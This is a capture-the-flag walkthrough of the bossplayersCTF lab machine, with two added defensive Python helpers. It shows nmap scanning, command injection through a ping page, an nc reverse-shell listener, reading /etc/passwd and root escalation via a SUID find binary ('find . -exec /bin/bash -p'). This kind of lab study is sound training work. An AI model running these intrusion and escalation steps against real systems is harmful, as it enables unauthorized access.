bossplayersCTF
Routine scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.122.0/24
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 06:59 EST
Nmap scan report for 192.168.122.1
Host is up (0.00041s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.122.2
Host is up (0.00032s latency).
MAC Address: 00:50:56:FE:B5:1F (VMware)
Nmap scan report for 192.168.122.131
Host is up (0.00066s latency).
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap scan report for 192.168.122.254
Host is up (0.00022s latency).
MAC Address: 00:50:56:E8:B1:09 (VMware)
Nmap scan report for 192.168.122.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.03 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 06:59 EST
Nmap scan report for 192.168.122.131
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.92 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:00 EST
Nmap scan report for 192.168.122.131
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
| 256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_ 256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:00 EST
Nmap scan report for 192.168.122.131
Host is up (0.00053s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 17.54 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:01 EST
Nmap scan report for 192.168.122.131
Host is up (0.00052s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /logs.php: Logs
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.26 seconds
Two files? Interesting.
Start a file/directory scan first and let it run.
Let me look at these two files.



Rabbit hole, next.
Leaked PHP page

Hidden information in the page source
WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
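Decoding the string above, as an added example that is not part of the original writeup: the value is base64 wrapped three times, so the helper keeps peeling layers for as long as the result is still valid base64 that decodes to printable text, and stops at the file name. The same helper handles the single-layer root.txt value shown later in the writeup; nothing here depends on the target being reachable.

```python
import base64
import binascii
from typing import List, Optional

# Page value: the string found in the page source (quoted in the writeup above).
PAGE_SOURCE_STRING = "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK"


def _try_decode(layer: str) -> Optional[str]:
    """Return the decoded text if `layer` is strict base64 yielding printable text, else None."""
    try:
        # validate=True rejects characters outside the base64 alphabet (e.g. the '.' in a
        # file name) and bad padding, which is what ends the loop on the real plaintext.
        raw = base64.b64decode(layer.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    # A plain word can be valid base64 by accident ("root" decodes to three random bytes);
    # requiring printable output stops the loop before we decode past the real message.
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def peel_base64(blob: str, max_layers: int = 10) -> List[str]:
    """Decode nested base64 one layer at a time.

    Returns every layer seen, outermost first and the recovered plaintext last.
    `max_layers` is a safety bound so a pathological input cannot loop forever.
    """
    layers = [blob.strip()]
    while len(layers) <= max_layers:
        nxt = _try_decode(layers[-1])
        if nxt is None:
            break
        layers.append(nxt.strip())
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(PAGE_SOURCE_STRING)):
        print(f"layer {depth}: {layer}")
```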

Viewing the page

Test ping command - [ ]
Command execution
[[工作/面试用的/RCE]]

Getting a shell
It really works; move the session over to Kali.

Privilege escalation
suid #find
[[SUID环境变量利用提权]]
[[sudo find]]
Here find has the SUID bit set,
so it is used to spawn bash and obtain a root session.
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
[sudo] kali 的密码:
listening on [any] 1234 ...
connect to [192.168.122.128] from (UNKNOWN) [192.168.122.131] 57022
python -c "import pty;pty.spawn('/bin/bash')"
www-data@bossplayers:/var/www/html$ ls
ls
index.html logs.php robots.txt workinginprogress.php
www-data@bossplayers:/var/www/html$ export TERM=xterm-color
export TERM=xterm-color
www-data@bossplayers:/var/www/html$ ls
ls
index.html logs.php robots.txt workinginprogress.php
www-data@bossplayers:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
cuong:x:1000:1000:cuong,,,:/home/cuong:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
www-data@bossplayers:/var/www/html$ cd /home
cd /home
www-data@bossplayers:/home$ la
la
bash: la: command not found
www-data@bossplayers:/home$ ls
ls
cuong
www-data@bossplayers:/home$ ls -liah
ls -liah
total 12K
205 drwxr-xr-x 3 root root 4.0K Sep 28 2019 .
2 drwxr-xr-x 18 root root 4.0K Sep 28 2019 ..
34 drwxr-xr-x 2 cuong cuong 4.0K Sep 28 2019 cuong
www-data@bossplayers:/home$ cd cuong
cd cuong
www-data@bossplayers:/home/cuong$ ls
ls
www-data@bossplayers:/home/cuong$ ls -liah
ls -liah
total 24K
34 drwxr-xr-x 2 cuong cuong 4.0K Sep 28 2019 .
205 drwxr-xr-x 3 root root 4.0K Sep 28 2019 ..
129 -rw------- 1 cuong cuong 5 Sep 28 2019 .bash_history
35 -rw-r--r-- 1 cuong cuong 220 Sep 28 2019 .bash_logout
36 -rw-r--r-- 1 cuong cuong 3.5K Sep 28 2019 .bashrc
45 -rw-r--r-- 1 cuong cuong 807 Sep 28 2019 .profile
www-data@bossplayers:/home/cuong$ cat .bash.history
cat .bash.history
cat: .bash.history: No such file or directory
www-data@bossplayers:/home/cuong$ sudo -l
sudo -l
bash: sudo: command not found
www-data@bossplayers:/home/cuong$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/grep
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/find
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
www-data@bossplayers:/home/cuong$ ^C
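The find output above is exactly what a host-hardening check should be comparing against a known-good list: find and grep are not SUID on a stock install, and an unexpected SUID binary is the misconfiguration this escalation relies on. The following is an added example, not code from the original writeup; the baseline set is an assumption (the SUID files a default Debian 10 install ships), so adjust it for the image you are auditing. The sample input is the find output quoted above, embedded as a constructed string.

```python
import os
import stat
from typing import Iterable, List

# Assumed baseline: SUID files present on a default Debian 10 (buster) install.
# Treat as an allowlist to review, not as ground truth for every image.
DEBIAN10_SUID_BASELINE = frozenset({
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
})

# Constructed sample: the `find / -perm -u=s -type f 2>/dev/null` output from the session above.
FIND_OUTPUT = """\
/usr/bin/mount
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/grep
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/find
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
"""


def unexpected_suid(find_output: Iterable[str], baseline=DEBIAN10_SUID_BASELINE) -> List[str]:
    """Return SUID paths that are not in the baseline, in the order they were reported."""
    flagged = []
    for line in find_output:
        path = line.strip()
        # Skip blank lines and the "find: ... Permission denied" noise that appears
        # when stderr was not redirected.
        if not path or path.startswith("find:"):
            continue
        if path not in baseline and path not in flagged:
            flagged.append(path)
    return flagged


def scan_suid(root: str = "/") -> List[str]:
    """Live equivalent of the find command: regular files under `root` with the SUID bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found
```

Each flagged path is a candidate for `chmod u-s` or for documenting as an intentional exception.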
Before this step, first set up a full interactive shell.
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.122.128] from (UNKNOWN) [192.168.122.131] 57024
python -c "import pty;pty.spawn('/bin/bash')"
www-data@bossplayers:/var/www/html$ ls
ls
index.html logs.php robots.txt workinginprogress.php
www-data@bossplayers:/var/www/html$ find . -exec /bin/bash -p \;
find . -exec /bin/bash -p \;
bash-5.0# whoami
whoami
root
bash-5.0# ls
ls
index.html logs.php robots.txt workinginprogress.php
bash-5.0# uname -a
uname -a
Linux bossplayers 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
bash-5.0# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:5a:bf:54 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.131/24 brd 192.168.122.255 scope global dynamic ens33
valid_lft 1360sec preferred_lft 1360sec
inet6 fe80::20c:29ff:fe5a:bf54/64 scope link
valid_lft forever preferred_lft forever
bash-5.0# cd /root
cd /root
bash-5.0# ls
ls
root.txt
bash-5.0# cat root.txt
cat root.txt
Y29uZ3JhdHVsYXRpb25zCg==
bash-5.0# echo 29uZ3JhdHVsYXRpb25zCg==
echo 29uZ3JhdHVsYXRpb25zCg==
29uZ3JhdHVsYXRpb25zCg==
bash-5.0# echo 29uZ3JhdHVsYXRpb25zCg==
echo 29uZ3JhdHVsYXRpb25zCg==
29uZ3JhdHVsYXRpb25zCg==
bash-5.0#
Done, wrapping up!